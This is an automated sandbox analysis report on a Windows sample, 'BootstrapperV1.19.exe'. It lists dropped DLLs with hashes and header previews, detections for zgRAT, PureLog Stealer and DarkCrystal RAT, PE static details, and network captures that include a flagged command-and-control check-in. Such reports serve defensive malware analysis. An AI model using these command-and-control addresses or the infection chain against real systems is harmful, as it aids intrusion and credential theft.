SHA-512:	468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C
Malicious:	false
Preview:	{. "args" : {. "code" : "xRCaC7cdBn". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

C:\Users\user\Desktop\FtgWXsHz.log

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\GnKnxRmO.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QWdDhtsw.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\VMFLzOzY.log

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gjQRaIsv.log

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\nFQoPqiw.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qHDXlZnr.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\wLNGnQCR.log

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\ELAMBKUP\7b3bf1de107bcf

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with very long lines (335), with no line terminators
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.856285264489716
Encrypted:	false
SSDEEP:	6:iDnL4ReDBiNpTEpSM6PXIYVr+Wgi9TmrrZ9on7BEcJCOb221lJlRRL:NNap/eJVJgi9kr0nMOb2gjRRL
MD5:	82C088ECE6D90EAE7F194B5A494F0788
SHA1:	795AF67451D64C581EAC40007022132F78B4B661
SHA-256:	30D169337FCA58A2C420463EEE1A0E13115A85EBE3AF07B0C18E8A86DFD01346
SHA-512:	63044C7F2440D182D5D9625E8AFA7669D08801C2DFFEF8C6EEC65A58A2F64E259317E0060F5597E429EEC941443CB83C8C95FB5FE86A3A60681C1B05322AEBC5
Malicious:	false
Preview:	w4yWBDHaKuSeB7WVHntfNYzUHKdiFDruJm56jehoy80maNTqo90qfbGXEdO1kiVGDiUZCawmFErPiN340x3FMAPsfh1GPqEPntj224nONOlau1z1jUAxoP4CTm3fipWYAblyoBC6Kp28Yy7orAg5pRkXzgjPAHqh1NZSPBMiSEm9X5neoPxhJbst1O8Hcw6C8UHLZpYqx8nlolA42EkuUIYZeqbBCEFfIkADxcF91GtKyHFPNDOXMLr06rqtOWns2IdDk7Ga9l2NYNlXkLx80rS62KHFvWvfcARqnBpQ7yYlTebsGTICio2KzgKa0ApnzXuX55tiggBBTrn

C:\Windows\ELAMBKUP\SIHClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.535182328864218
Encrypted:	false
SSDEEP:	24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
MD5:	3C3B7D5864E9F151A77B33D4B9D15E3C
SHA1:	D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
SHA-256:	DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
SHA-512:	5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\ELAMBKUP\SIHClient.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\ELAMBKUP\SIHClient.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465759658778501
Encrypted:	false
SSDEEP:	6144:FIXfpi67eLPU9skLmb0b4WWSPKaJG8nAgejZMMhA2gX4WABl0uN0dwBCswSb6:mXD94WWlLZMM6YFHm+6
MD5:	48ED625AF3CF0CD3D902FA61F38A10F8
SHA1:	DFEC2BC4C3097426D9EF7E6878C0AF04F9677345
SHA-256:	89671CBE4CF2E6BE10E36092F551F280A8D7B1648B07E3887FDD0ADFB27B8877
SHA-512:	7AAD458F42E2CA9A2444407D5E2E1E3FA392BD4AA11FAB1DA21E2B57CF59D09D5B62B98763295DCF814922CB1DEC04F1AA0588A03E451DC7B65EF04FB84B7622
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...'............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
File Type:	ISO-8859 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	571
Entropy (8bit):	4.9398118662542965
Encrypted:	false
SSDEEP:	12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
MD5:	5294778E41EE83E1F1E78B56466AD690
SHA1:	348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
SHA-256:	3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
SHA-512:	381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
Preview:	.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.76476480419232
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXUMpvVsSbv2SLy6vpfZGKvj:Vx993DEU9MpOiv2up
MD5:	F0FA1B17316A4A1096F9914C24C66901
SHA1:	B58AB4FAFD068FD98377BD0A31A768341F85DE73
SHA-256:	AB6C50FB8B6E8D9EE8512323A4A3B34382C88D5776CADE4C986D4237CC2C3489
SHA-512:	C9CA0C8099C13FAD631ACE82FC33C0BF8AA1375FEDF142915FF3E88C3571CFE0DE6F51E9987FEAD6C9C7EC490AE1B6B3671608F44DE861260134849918CFB4D2
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 14/09/2024 08:02:17..08:02:17, error: 0x80072746.08:02:22, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.037500694183959
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% InstallShield setup (43055/19) 0.21% Win32 Executable Delphi generic (14689/80) 0.07% Windows Screen Saver (13104/52) 0.07%
File name:	BootstrapperV1.19.exe
File size:	3'247'616 bytes
MD5:	c9d720a4200df5064f655adc3656056f
SHA1:	0dc179cfc3cf564ea1e9c85e012ac9bda3b40464
SHA256:	9cd19cf01e1d8c64caa0dffcd07dfb3304fc7257a1c468c0f3d4df1ad696319f
SHA512:	f0628313d0bccdd94795d649f1f6eda194b97fe991fb1755d9525cf944b310569a6dc0a155caf17dc4e49fda4c5eaf42063443bb67abc19a079f934570136852
SSDEEP:	49152:ivotkNjg/lhqZvGyBJa+U5kzXDFrO0iTb0bzveEX99h:i5ZvGko+U8XBgseE5
TLSH:	7FE5BF123BE1DE33C27D1771E4A2163953B8E6617662EB0F2A0D19D55C133E18E263BB
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4020cc
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d59a4a699610169663a929d37c90be43

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 0000000Ch
push 00000000h
push 00000000h
dec ecx
jne 00007F7B7508896Bh
push ecx
push ebx
push esi
push edi
mov eax, 0040209Ch
call 00007F7B750883E0h
xor eax, eax
push ebp
push 00402361h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
lea edx, dword ptr [ebp-14h]
mov eax, 00402378h
call 00007F7B750887B9h
mov eax, dword ptr [ebp-14h]
call 00007F7B75088889h
mov edi, eax
test edi, edi
jng 00007F7B75088BA6h
mov ebx, 00000001h
lea edx, dword ptr [ebp-20h]
mov eax, ebx
call 00007F7B75088848h
mov ecx, dword ptr [ebp-20h]
lea eax, dword ptr [ebp-1Ch]
mov edx, 00402384h
call 00007F7B75087FD8h
mov eax, dword ptr [ebp-1Ch]
lea edx, dword ptr [ebp-18h]
call 00007F7B7508877Dh
mov edx, dword ptr [ebp-18h]
mov eax, 00404680h
call 00007F7B75087EB0h
lea edx, dword ptr [ebp-2Ch]
mov eax, ebx
call 00007F7B75088816h
mov ecx, dword ptr [ebp-2Ch]
lea eax, dword ptr [ebp-28h]
mov edx, 00402390h
call 00007F7B75087FA6h
mov eax, dword ptr [ebp-28h]
lea edx, dword ptr [ebp-24h]
call 00007F7B7508874Bh
mov edx, dword ptr [ebp-24h]
mov eax, 00404684h
call 00007F7B75087E7Eh
lea edx, dword ptr [ebp-38h]
mov eax, ebx
call 00007F7B750887E4h
mov ecx, dword ptr [ebp-38h]
lea eax, dword ptr [ebp-34h]
mov edx, 0040239Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5000	0x302	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9000	0x316a18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x1c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x13b8	0x1400	e5913936857bed3b3b2fbac53e973471	False	0.6318359375	data	6.340990548290613	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x3000	0x7c	0x200	cef89de607e490725490a3cd679af6bb	False	0.162109375	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4230400	1.1176271682252383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x4000	0x695	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5000	0x302	0x400	3d2f2fc4e279cba623217ec9de264c4f	False	0.3876953125	data	3.47731642923935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7000	0x18	0x200	467f29e48f3451df774e13adae5aafc2	False	0.05078125	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x1c8	0x200	9859d413c7408cb699cca05d648c2502	False	0.876953125	data	5.7832974211095225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x9000	0x316a18	0x316c00	5b26b135edb6e73e512dc9a0c858f46f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x9294	0xf3200	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows	0.3470135764781491
RT_RCDATA	0xfc494	0x2234f9	PE32 executable (GUI) Intel 80386, for MS Windows	0.48017215728759766
RT_RCDATA	0x31f990	0x15	ASCII text, with no line terminators	1.380952380952381
RT_RCDATA	0x31f9a8	0x12	ASCII text, with no line terminators	1.3333333333333333
RT_RCDATA	0x31f9bc	0x1	very short file (no magic)	9.0
RT_RCDATA	0x31f9c0	0x1	very short file (no magic)	9.0
RT_RCDATA	0x31f9c4	0x1	very short file (no magic)	9.0
RT_RCDATA	0x31f9c8	0x1	very short file (no magic)	9.0
RT_RCDATA	0x31f9cc	0x10	data	1.5
RT_RCDATA	0x31f9dc	0x1	very short file (no magic)	9.0
RT_RCDATA	0x31f9e0	0x38	data	1.0714285714285714

Imports

DLL	Import
kernel32.dll	GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
kernel32.dll	WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
shfolder.dll	SHGetFolderPathA
shell32.dll	ShellExecuteA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-14T12:53:05.144390+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	62761	80.211.144.156	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2024 12:52:04.116233110 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:04.116339922 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:04.116410017 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:04.530397892 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:04.530458927 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.022922039 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.023000956 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.027544022 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.027573109 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.028090000 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.071428061 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.093449116 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.139421940 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.195836067 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.195949078 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.195993900 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.196024895 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.196167946 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.196208000 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.196221113 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.196336031 CEST	443	49730	172.67.203.125	192.168.2.4
Sep 14, 2024 12:52:05.196398973 CEST	49730	443	192.168.2.4	172.67.203.125
Sep 14, 2024 12:52:05.214947939 CEST	49730	443	192.168.2.4	172.67.203.125
